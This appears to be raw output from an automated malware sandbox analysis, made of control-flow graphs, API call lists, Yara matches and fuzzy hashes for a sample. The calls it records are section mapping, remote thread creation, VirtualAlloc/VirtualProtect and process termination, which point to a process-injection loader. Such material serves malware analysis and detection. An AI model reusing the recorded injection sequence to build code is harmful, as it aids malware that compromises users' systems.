                                                            control_flow_graph 151 401514-401533 153 401524-40152f 151->153 154 401536-40156e call 401193 151->154 153->154 163 401570 154->163 164 401573-401578 154->164 163->164 166 401898-4018a0 164->166 167 40157e-40158f 164->167 166->164 170 4018a5-4018b7 166->170 171 401595-4015be 167->171 172 401896 167->172 178 4018c5 170->178 179 4018bc-4018e3 call 401193 170->179 171->172 181 4015c4-4015db NtDuplicateObject 171->181 172->170 178->179 181->172 183 4015e1-401605 NtCreateSection 181->183 185 401661-401687 NtCreateSection 183->185 186 401607-401628 NtMapViewOfSection 183->186 185->172 189 40168d-401691 185->189 186->185 188 40162a-401646 NtMapViewOfSection 186->188 188->185 191 401648-40165e 188->191 189->172 192 401697-4016b8 NtMapViewOfSection 189->192 191->185 192->172 194 4016be-4016da NtMapViewOfSection 192->194 194->172 196 4016e0 call 4016e5 194->196
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                            • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                            • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                            • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 198 4014fe-401503 199 401531-40156e call 401193 198->199 200 401506-401511 198->200 210 401570 199->210 211 401573-401578 199->211 210->211 213 401898-4018a0 211->213 214 40157e-40158f 211->214 213->211 217 4018a5-4018b7 213->217 218 401595-4015be 214->218 219 401896 214->219 225 4018c5 217->225 226 4018bc-4018e3 call 401193 217->226 218->219 228 4015c4-4015db NtDuplicateObject 218->228 219->217 225->226 228->219 230 4015e1-401605 NtCreateSection 228->230 232 401661-401687 NtCreateSection 230->232 233 401607-401628 NtMapViewOfSection 230->233 232->219 236 40168d-401691 232->236 233->232 235 40162a-401646 NtMapViewOfSection 233->235 235->232 238 401648-40165e 235->238 236->219 239 401697-4016b8 NtMapViewOfSection 236->239 238->232 239->219 241 4016be-4016da NtMapViewOfSection 239->241 241->219 243 4016e0 call 4016e5 241->243
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectView
                                                            • String ID:
                                                            • API String ID: 1652636561-0
                                                            • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                            • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                            • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                            • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 245 401542-40156e call 401193 254 401570 245->254 255 401573-401578 245->255 254->255 257 401898-4018a0 255->257 258 40157e-40158f 255->258 257->255 261 4018a5-4018b7 257->261 262 401595-4015be 258->262 263 401896 258->263 269 4018c5 261->269 270 4018bc-4018e3 call 401193 261->270 262->263 272 4015c4-4015db NtDuplicateObject 262->272 263->261 269->270 272->263 274 4015e1-401605 NtCreateSection 272->274 276 401661-401687 NtCreateSection 274->276 277 401607-401628 NtMapViewOfSection 274->277 276->263 280 40168d-401691 276->280 277->276 279 40162a-401646 NtMapViewOfSection 277->279 279->276 282 401648-40165e 279->282 280->263 283 401697-4016b8 NtMapViewOfSection 280->283 282->276 283->263 285 4016be-4016da NtMapViewOfSection 283->285 285->263 287 4016e0 call 4016e5 285->287
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                            • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                            • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                            • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 289 401549-40156e call 401193 293 401570 289->293 294 401573-401578 289->294 293->294 296 401898-4018a0 294->296 297 40157e-40158f 294->297 296->294 300 4018a5-4018b7 296->300 301 401595-4015be 297->301 302 401896 297->302 308 4018c5 300->308 309 4018bc-4018e3 call 401193 300->309 301->302 311 4015c4-4015db NtDuplicateObject 301->311 302->300 308->309 311->302 313 4015e1-401605 NtCreateSection 311->313 315 401661-401687 NtCreateSection 313->315 316 401607-401628 NtMapViewOfSection 313->316 315->302 319 40168d-401691 315->319 316->315 318 40162a-401646 NtMapViewOfSection 316->318 318->315 321 401648-40165e 318->321 319->302 322 401697-4016b8 NtMapViewOfSection 319->322 321->315 322->302 324 4016be-4016da NtMapViewOfSection 322->324 324->302 326 4016e0 call 4016e5 324->326
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                            • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                            • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                            • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 328 401557 329 40155b-40156e call 401193 328->329 330 40154f-401554 328->330 333 401570 329->333 334 401573-401578 329->334 330->329 333->334 336 401898-4018a0 334->336 337 40157e-40158f 334->337 336->334 340 4018a5-4018b7 336->340 341 401595-4015be 337->341 342 401896 337->342 348 4018c5 340->348 349 4018bc-4018e3 call 401193 340->349 341->342 351 4015c4-4015db NtDuplicateObject 341->351 342->340 348->349 351->342 353 4015e1-401605 NtCreateSection 351->353 355 401661-401687 NtCreateSection 353->355 356 401607-401628 NtMapViewOfSection 353->356 355->342 359 40168d-401691 355->359 356->355 358 40162a-401646 NtMapViewOfSection 356->358 358->355 361 401648-40165e 358->361 359->342 362 401697-4016b8 NtMapViewOfSection 359->362 361->355 362->342 364 4016be-4016da NtMapViewOfSection 362->364 364->342 366 4016e0 call 4016e5 364->366
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                            • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                            • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                            • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 372 402f97-402fbb 373 402fc1-402fd9 372->373 374 4030ee-4030f3 372->374 373->374 375 402fdf-402ff0 373->375 376 402ff2-402ffb 375->376 377 403000-40300e 376->377 377->377 378 403010-403017 377->378 379 403039-403040 378->379 380 403019-403038 378->380 381 403062-403065 379->381 382 403042-403061 379->382 380->379 383 403067-40306a 381->383 384 40306e 381->384 382->381 383->384 385 40306c 383->385 384->376 386 403070-403075 384->386 385->386 386->374 387 403077-40307a 386->387 387->374 388 40307c-4030eb RtlCreateUserThread NtTerminateProcess 387->388 388->374
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CreateProcessTerminateThreadUser
                                                            • String ID:
                                                            • API String ID: 1921587553-0
                                                            • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                            • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                            • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                            • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 389 2dbae2e-2dbae47 390 2dbae49-2dbae4b 389->390 391 2dbae4d 390->391 392 2dbae52-2dbae5e CreateToolhelp32Snapshot 390->392 391->392 393 2dbae6e-2dbae7b Module32First 392->393 394 2dbae60-2dbae66 392->394 395 2dbae7d-2dbae7e call 2dbaaed 393->395 396 2dbae84-2dbae8c 393->396 394->393 399 2dbae68-2dbae6c 394->399 400 2dbae83 395->400 399->390 399->393 400->396
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02DBAE56
                                                            • Module32First.KERNEL32(00000000,00000224), ref: 02DBAE76
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1818742060.0000000002DB7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DB7000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2db7000_file.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3833638111-0
                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction ID: 174ea6d4b70f6c5ef2006ce62384816aac4a28d51b7e8e4a656c62441995012c
                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction Fuzzy Hash: CCF09635600711ABD7213BF9A89DBEF76ECEF49724F100528E697911C0DB70EC458A61

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 66 2d8003c-2d80047 67 2d80049 66->67 68 2d8004c-2d80263 call 2d80a3f call 2d80e0f call 2d80d90 VirtualAlloc 66->68 67->68 83 2d8028b-2d80292 68->83 84 2d80265-2d80289 call 2d80a69 68->84 86 2d802a1-2d802b0 83->86 88 2d802ce-2d803c2 VirtualProtect call 2d80cce call 2d80ce7 84->88 86->88 89 2d802b2-2d802cc 86->89 95 2d803d1-2d803e0 88->95 89->86 96 2d80439-2d804b8 VirtualFree 95->96 97 2d803e2-2d80437 call 2d80ce7 95->97 99 2d804be-2d804cd 96->99 100 2d805f4-2d805fe 96->100 97->95 102 2d804d3-2d804dd 99->102 103 2d8077f-2d80789 100->103 104 2d80604-2d8060d 100->104 102->100 106 2d804e3-2d80505 102->106 107 2d8078b-2d807a3 103->107 108 2d807a6-2d807b0 103->108 104->103 109 2d80613-2d80637 104->109 118 2d80517-2d80520 106->118 119 2d80507-2d80515 106->119 107->108 110 2d8086e-2d808be LoadLibraryA 108->110 111 2d807b6-2d807cb 108->111 112 2d8063e-2d80648 109->112 117 2d808c7-2d808f9 110->117 115 2d807d2-2d807d5 111->115 112->103 113 2d8064e-2d8065a 112->113 113->103 116 2d80660-2d8066a 113->116 120 2d80824-2d80833 115->120 121 2d807d7-2d807e0 115->121 124 2d8067a-2d80689 116->124 126 2d808fb-2d80901 117->126 127 2d80902-2d8091d 117->127 128 2d80526-2d80547 118->128 119->128 125 2d80839-2d8083c 120->125 122 2d807e2 121->122 123 2d807e4-2d80822 121->123 122->120 123->115 130 2d8068f-2d806b2 124->130 131 2d80750-2d8077a 124->131 125->110 132 2d8083e-2d80847 125->132 126->127 129 2d8054d-2d80550 128->129 133 2d805e0-2d805ef 129->133 134 2d80556-2d8056b 129->134 135 2d806ef-2d806fc 130->135 136 2d806b4-2d806ed 130->136 131->112 137 2d80849 132->137 138 2d8084b-2d8086c 132->138 133->102 140 2d8056d 134->140 141 2d8056f-2d8057a 134->141 142 2d8074b 135->142 143 2d806fe-2d80748 135->143 136->135 137->110 138->125 140->133 144 2d8059b-2d805bb 141->144 145 2d8057c-2d80599 141->145 142->124 143->142 150 2d805bd-2d805db 144->150 145->150 150->129
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02D8024D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1818600751.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2d80000_file.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: cess$kernel32.dll
                                                            • API String ID: 4275171209-1230238691
                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction ID: a3dcd30f86fae6a66a967e8b9b219d76427dd2864350c8a661673b37e68e1691
                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction Fuzzy Hash: 9B526875A01229DFDB64DF58C984BA8BBB1BF09305F1480D9E94DAB351DB30AE89CF14

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 368 415792-415920 GetModuleHandleW GetProcAddress VirtualProtect
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(02B18CE8), ref: 004158BF
                                                            • GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 004158FC
                                                            • VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 0041591B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817408197.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-3916222277
                                                            • Opcode ID: 0c7ca108b8e1f9837bab8f0d1351edd7a41117851920c5af44396fde0a8b5c73
                                                            • Instruction ID: d67ab6015398af25ee4ccbcaa24419cc1747ddacc62f126d36a823bcbb263e11
                                                            • Opcode Fuzzy Hash: 0c7ca108b8e1f9837bab8f0d1351edd7a41117851920c5af44396fde0a8b5c73
                                                            • Instruction Fuzzy Hash: 81313E20A5B680CBF301CB78F8047823B62BB65744F548479D5498B3A5EBBA4534E7EF

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 371 4157e0-415920 GetModuleHandleW GetProcAddress VirtualProtect
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(02B18CE8), ref: 004158BF
                                                            • GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 004158FC
                                                            • VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 0041591B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817408197.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-3916222277
                                                            • Opcode ID: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
                                                            • Instruction ID: 391a96fec73ca33ccc7d485fbd88f315141c0e441e0fac2c4929083d5726926d
                                                            • Opcode Fuzzy Hash: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
                                                            • Instruction Fuzzy Hash: 64311C20A5B680CBF301CB78F8047923A62BB25744F44857895498B3A5EBBA5534E7EF

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 402 2d80e0f-2d80e24 SetErrorMode * 2 403 2d80e2b-2d80e2c 402->403 404 2d80e26 402->404 404->403
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00000400,?,?,02D80223,?,?), ref: 02D80E19
                                                            • SetErrorMode.KERNELBASE(00000000,?,?,02D80223,?,?), ref: 02D80E1E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1818600751.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2d80000_file.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction ID: e137e78b578b6a5f483533a7db217aef9f66ea24294c700cfcf316ed3c75de30
                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction Fuzzy Hash: C2D0123214512877D7013A94DC09BCE7B1CDF05B67F008011FB0DD9180C770994046E5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 405 4018e6-40194b call 401193 Sleep call 40141f 419 40195a-4019a5 call 401193 405->419 420 40194d-401955 call 401514 405->420 420->419
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                            • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                            • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                            • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 434 401915-401918 435 4018c6-4018c7 434->435 436 40191a-40194b call 401193 Sleep call 40141f 434->436 437 4018d7 435->437 438 4018ce-4018e3 call 401193 435->438 448 40195a-4019a5 call 401193 436->448 449 40194d-401955 call 401514 436->449 437->438 449->448
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                            • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                            • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                            • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 463 4018f1-40194b call 401193 Sleep call 40141f 473 40195a-4019a5 call 401193 463->473 474 40194d-401955 call 401514 463->474 474->473
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                            • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                            • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                            • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                            • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                            • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                            • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02DBAB3E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1818742060.0000000002DB7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DB7000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2db7000_file.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
